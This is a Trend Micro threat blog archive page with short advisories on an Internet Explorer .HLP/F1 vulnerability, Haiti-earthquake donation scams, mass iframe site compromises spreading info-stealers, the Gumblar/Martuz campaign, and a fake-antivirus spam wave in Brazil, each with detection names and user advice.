Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    September 2015
    S M T W T F S
    « Aug    
  • Email Subscription

  • About Us

    Author Archive - Roderick Ordoñez (Technical Communications)

    Asking for help in Windows could lead to more trouble.

    A newly discovered vulnerability in Internet Explorer (IE) leverages the ability of a Visual Basic script to invoke an .HLP (Windows Help file format) file, which could give a remote attacker the ability to run arbitrary code on an affected system.

    Visual Basic uses the following syntax to call the MsgBox function, which is used to display message boxes:


    However, if a specially crafted .HLP file passes as a variable, remote users would be able to run arbitrary code on an affected system. To trigger the vulnerability, some user interaction is needed, as he/she has to be directed to the page hosting the exploit and to press F1 when the message box appears.

    The exploit does not affect all versions of Windows. Systems running Windows 2000, Windows XP, and Windows Server 2003 are vulnerable. Those that run Vista, Server 2008, Server 2008 R2, and Windows 7 are not.

    Microsoft is already aware of the issue and has issued the following statement:

    Our teams are working to address the issue and once we complete our investigation, we will take appropriate action to protect customers. This may include releasing an update out of band. We will provide further updates as they become available.

    In addition, it also released a security advisory that details several workarounds for the said vulnerability. For users, the most important advice is simple—do not press the F1 key when prompted by a website.

    Until the official patch is released, however, Trend Micro Deep Security™ can help shield users from this vulnerability and Trend Micro OfficeScan™ users with Intrusion Defense Firewall (IDF) plug-in are also protected from this attack if their systems are updated with the IDF10-009 release and rule number IDF1004019.


    After the earthquake that hit Haiti last January 12, the Internet was flooded with requests for financial donations from all sorts of companies and organizations. It should be noted that not all of these were true to their stated intentions.

    Martin Roesler, Trend Micro Director of Threat Research, warns Internet users to be very careful when clicking links regarding the latest earthquakes in Haiti. “We have already seen fake donation sites, spam, and FAKEAV-related search engine optimization (SEO) poisoning attacks using this event as a social engineering tactic and their number is still increasing. Users who really want to make a donation should ensure that they do so only on trusted sites, that all the security features of their Web browsers are enabled, and that they manually double-check the URLs they are connecting to. Do not trust email messages offering ‘one-click-donation’ or similar services.”


    The spammed message above poses as a call for relief goods and donations supposedly from the UNICEF International Response Fund. It even described the supposed efforts the agency is currently engaging in to assist victims of the recent Haiti earthquake. Unfortunately, however, the link to the supposed donation site was found to lead to a phishing page instead.

    Users searching for information about the event are also at risk of landing on malicious sites due to SEO poisoning. Clicking poisoned links lead to the installation of TROJ_FAKEAV.ZXS, a FAKEAV variant.


    Using tragedies as a social engineering tactic is no longer new to cybercriminals. Natural calamities, celebrity deaths, viral videos, and other controversial stories—just about anything that can create a huge ruckus on the Web—are just some of their staple scam triggers. As such, both the Federal Bureau of Investigation (FBI) and CNET have released articles to make would-be donors aware of these and thereby protect themselves.

    Trend Mico™ Smart Protection Network™ protects users from threats like these in real time by preventing spammed messages from reaching their inboxes, blocking access to identified malicious sites and domains, and detecting and preventing the download of malicious files.


    Aside from Gumblar, another incident of mass compromised web sites have been seen in the wild lately, and has raised as much concern as the former. This one starts with the same technique: a malicious IFRAME unknowingly embedded in a legitimate website, injected via JavaScript. The said IFRAME redirects to another IFRAME, which in turn executes obfuscated JavaScript code.

    Once decoded, it tries to connect to URLs to download exploits for several vulnerabilites in order to gain access of the affected user’s system. The obfuscated malicious JavaScript is detected as JS_DROPPER.LOK while the URLs that trigger the download of the exploits are detected as TROJ_SHELLCOD.HT. Upon successful exploitation, other malicious files are then downloaded, which Trend Micro detects as TROJ_MEDPINCH.B, and TROJ_MEDPINCH.A.

    TROJ_MEDPINCH.B connects to other URLs to download info-stealers SPYW_IEWATCHER and TSPY_LDPINCH.CBS. On the other hand, TROJ_MEDPINCH.A drops yet another info-stealer: TSPY_LDPINCH.ASG. TSPY_LDPINCH.ASG steals user names, passwords, and other account and installation information of the following applications:

    • INETCOMM Server
    • Microsoft Outlook
    • Mirabilis ICQ
    • Opera Software
    • The Bat!
    • Total Commander
    • Trillian

    Though this compromise occurs within close proximity days after Gumblar’s last attack, no mention of the Gumblar.{BLOCKED} domain appears in the code. This attack may indeed be a separate one from Gumblar, or possibly be inspired by it. Related URLs are already blocked by the Smart Protection Network, but it is highly advised that user’s patch their system to minimize the chances of exploit through the following updates:


    Gumblar.{BLOCKED}, the domain to which visitors of reported compromised websites were directed to was taken down, only to be replaced by a new one: Martuz.{BLOCKED}.

    gumblar_finds_successorIn an attack which quickly garnered much attention in the security industry, visiting compromised websites were found to redirect the user to Martuz.{BLOCKED}, which leads to a download of a file in users’ systems. It then uses Adobe PDF and Flash player vulnerabilities to gain system access. Once installed, the malware is able to steal stored passwords, which it delivers back to its creators via FTP. These stolen passwords may ultimately lead to the unauthorized tampering of the user’s web server files, wherein obfuscated JavaScript is inserted into several files. The vandalized pages containing the JavaScript now become the malware author’s newest redirectors, continuing the vicious cycle of information stealing. Additionally, the malicious file poisons the results of Google searches conducted by the user of the affected system, thus leading them to more malicious domains.

    Our engineers are still in the process of analyzing the said malicious file. In the meantime, Trend Micro detects the redirecting scripts as HTML_JSREDIR.AE and HTML_REDIR.AC. Injected scripts vary for each infected page, and the exact epicenter of the attack is still yet to be determined.

    Using a browser other than Internet Explorer may help minimize the risk of getting infected, and updating software to address vulnerabilities is a must. Site owners should do an immediate cleanup if an infection is detected, and passwords should be changed as soon as possible.


    Fake/rogue antivirus strikes again, this time targeting the users in Brazil. Like in today’s malware trends, it did not come alone.

    It initially starts with a spam message:

    Hello, I am sending you my invitation to the graduation location, date and time

    Hello, I am sending you my invitation to the graduation location, date and time.
    I count on your presence.
    We are there,
    Abraços …

    ConviteFormatura.pps (52KB)

    fakeantivirustargetsbrazilThe malware gets installed once the user opens the attachment—which leads to the malfunction of several executables in the system. The malware is also able to disrupt the normal functions of the Windows shell, consequently resulting in difficulty opening folders.

    Attempts to open files created in the programs affected by this malware would result to the display of a fancy error message reassuring the user that there is a solution to the error being experienced. Clicking the said message’s [Click here] button brings the user to the Brazilian site Byte Clark, which offers yet another fake antivirus by the same name. Users are then advised to purchase the program to restore the system (a routine which therefore qualifies this as ransomware).

    Trend Micro detects the fake antivurs as TROJ_FAKEAV.BBH. Running the program only removes the files added by the original malicious attachment. It is also able to collect specific data from the user’s computer and send it to a predefined email address.

    Spam is a common delivery vehicle for malware, not just being limited to rogue antivirus. And as usual, people behind this scam rely on the user’s panic to look for a quick solution. As spammers/scammers use more pleasant/kinder wordings to get their message across, users are advised to exercise caution.

    Users under the Smart Protection Network are already protected against this threat.



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice